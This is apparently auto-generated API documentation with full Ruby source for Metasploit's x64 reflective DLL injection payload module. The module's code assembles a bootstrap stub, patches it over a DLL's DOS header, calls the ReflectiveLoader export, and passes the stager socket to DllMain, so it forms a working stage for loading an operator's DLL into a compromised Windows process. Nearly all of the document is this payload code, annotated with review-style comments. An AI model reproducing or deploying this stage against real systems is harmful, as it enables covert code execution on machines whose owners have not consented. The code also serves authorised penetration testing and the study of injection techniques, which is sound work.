Module: Msf::Payload::Windows::ReflectiveDllInject_x64

Includes:
Msf::Payload::Windows, ReflectiveDLLLoader
Defined in:
lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb

Constant Summary

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#asm_invoke_dll(opts = {}) ⇒ Object



# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 40

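# Build the x64 bootstrap stub that stage_payload patches over the DLL's DOS header.
#
# The stub's first two bytes are the 'MZ' signature, which also decode as "pop r10"
# (see the asm comment), so the header stays a valid DOS header while being executable.
# It then locates ReflectiveLoader() from :rdi_offset, calls it, and calls the DllMain
# address it returns twice: reason 4 (DLL_METASPLOIT_ATTACH) with the stager socket,
# then reason 5 (DLL_METASPLOIT_DETACH) with the exit technique.
#
# @param opts [Hash]
#   :rdi_offset [Integer] offset of the ReflectiveLoader export from the DLL start (required;
#                         must be >= 0x15 because the first 0x15 bytes are the stub itself)
#   :exitfunk   [String]  key into Msf::Payload::Windows.exit_types, e.g. 'thread' (required)
# @return [String] Metasm assembly source for the stub
# @raise [ArgumentError] when :rdi_offset is missing/too small or :exitfunk is not a known exit type
def asm_invoke_dll(opts={})
  rdi_offset = opts[:rdi_offset]
  # Previously a missing offset/exitfunk surfaced as a TypeError from String#% (or as
  # "0x..f"-style negative output that the assembler would reject); fail early instead.
  unless rdi_offset.is_a?(Integer) && rdi_offset >= 0x15
    raise ArgumentError, "asm_invoke_dll requires :rdi_offset (Integer >= 0x15), got #{rdi_offset.inspect}"
  end

  exit_code = Msf::Payload::Windows.exit_types[opts[:exitfunk]]
  if exit_code.nil?
    raise ArgumentError, "Unknown exitfunk #{opts[:exitfunk].inspect}; expected one of #{Msf::Payload::Windows.exit_types.keys.inspect}"
  end

  # 0x15 is the size of everything emitted before "pop rbx" (MZ bytes, the three pushes/moves,
  # sub, and the 5-byte call), i.e. the value the GetPC trick leaves in rbx relative to the
  # DLL base. Adding (rdi_offset - 0x15) therefore lands rbx on ReflectiveLoader().
  #
  # NOTE(review): rcx (hInstance for the two DllMain calls) is never written by this stub;
  # it carries whatever ReflectiveLoader() left there. Confirm the loader's DllMain ignores
  # hinstDLL for reason codes 4 and 5. rdi is the socket per the 'sockrdi' convention.
  asm = %Q^
      ; prologue
        db 0x4d, 0x5a         ; 'MZ' = "pop r10"
        push r10              ; back to where we started
        push rbp              ; save rbp
        mov rbp, rsp          ; set up a new stack frame
        sub rsp, 32           ; allocate some space for calls.
        and rsp, ~0xF         ; Ensure RSP is 16 byte aligned
      ; GetPC
        call $+5              ; relative call to get location
        pop rbx               ; pop return value
      ; Invoke ReflectiveLoader()
        ; add the offset to ReflectiveLoader()
        add rbx, #{"0x%.8x" % (rdi_offset - 0x15)}
        call rbx              ; invoke ReflectiveLoader()
      ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
        ; rax now holds the DllMain address returned by ReflectiveLoader()
        mov r8, rdi           ; r8 contains the socket
        mov rbx, rax          ; save DllMain for another call
        push 4                ; push up 4, indicate that we have attached
        pop rdx               ; pop 4 into rdx
        call rbx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
      ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
        ; push the exitfunk value onto the stack
        mov r8d, #{"0x%.8x" % exit_code}
        push 5                ; push 5, indicate that we have detached
        pop rdx               ; pop 5 into rdx
        call rbx              ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
  ^
end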

#initialize(info = {}) ⇒ Object



# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 18

# Register the module metadata and the single DLL option.
#
# 'Convention' => 'sockrdi' records that the stager hands the socket to this stage in rdi;
# the bootstrap built by asm_invoke_dll relies on that. 'Stage' is left empty because the
# stage bytes are produced on demand by stage_payload from the operator-supplied DLL.
#
# @param info [Hash] module info merged via update_info
def initialize(info = {})
  module_info = {
    'Name'          => 'Reflective DLL Injection',
    'Description'   => 'Inject a DLL via a reflective loader',
    'Author'        => [ 'sf' ],
    'References'    => [
      [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
      [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
    ],
    'Platform'      => 'win',
    'Arch'          => ARCH_X64,
    'PayloadCompat' => { 'Convention' => 'sockrdi' },
    'Stage'         => { 'Payload'   => "" }
  }
  super(update_info(info, module_info))

  # DLL is a local path chosen by the operator; stage_payload reads it through library_path.
  dll_option = OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] )
  register_options( [ dll_option ], self.class )
end

#library_path ⇒ Object



# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 36

# Local path of the reflective DLL to inject, as set through the DLL option.
#
# @return [String, nil] the datastore value (nil when the option is unset)
def library_path
  dll_path = datastore['DLL']
  dll_path
end

#stage_payload(opts = {}) ⇒ Object



# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 72

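# Produce the stage: the operator's DLL with the x64 bootstrap stub patched over its DOS header.
#
# @param opts [Hash] currently unused; the exit technique is fixed to 'thread'
# @return [String] the DLL bytes with the bootstrap written at offset 0
# @raise [RuntimeError] if the assembled bootstrap would overwrite e_lfanew
#   (load_rdi_dll raises its own exceptions when the DLL cannot be loaded)
def stage_payload(opts = {})
  # load_rdi_dll raises if the DLL can't be read or the ReflectiveLoader export isn't found.
  dll, offset = load_rdi_dll(library_path)

  asm_opts = {
    rdi_offset: offset,
    exitfunk:   'thread'  # default to 'thread' for migration; opts is not consulted
  }

  asm = asm_invoke_dll(asm_opts)

  # assemble the bootstrap stub
  bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string

  # The stub is written from offset 0, and e_lfanew (the DOS header field that points to the
  # NT headers) occupies bytes 0x3C..0x3F. Anything longer than 0x3C (60) bytes therefore
  # clobbers it; the previous bound of 62 let the two low bytes be overwritten.
  max_bootstrap = 0x3C
  if bootstrap.length > max_bootstrap
    raise RuntimeError, "Reflective DLL Injection (x64) generated an oversized bootstrap!"
  end

  # patch the bootstrap code into the dll's DOS header...
  dll[ 0, bootstrap.length ] = bootstrap

  dll
end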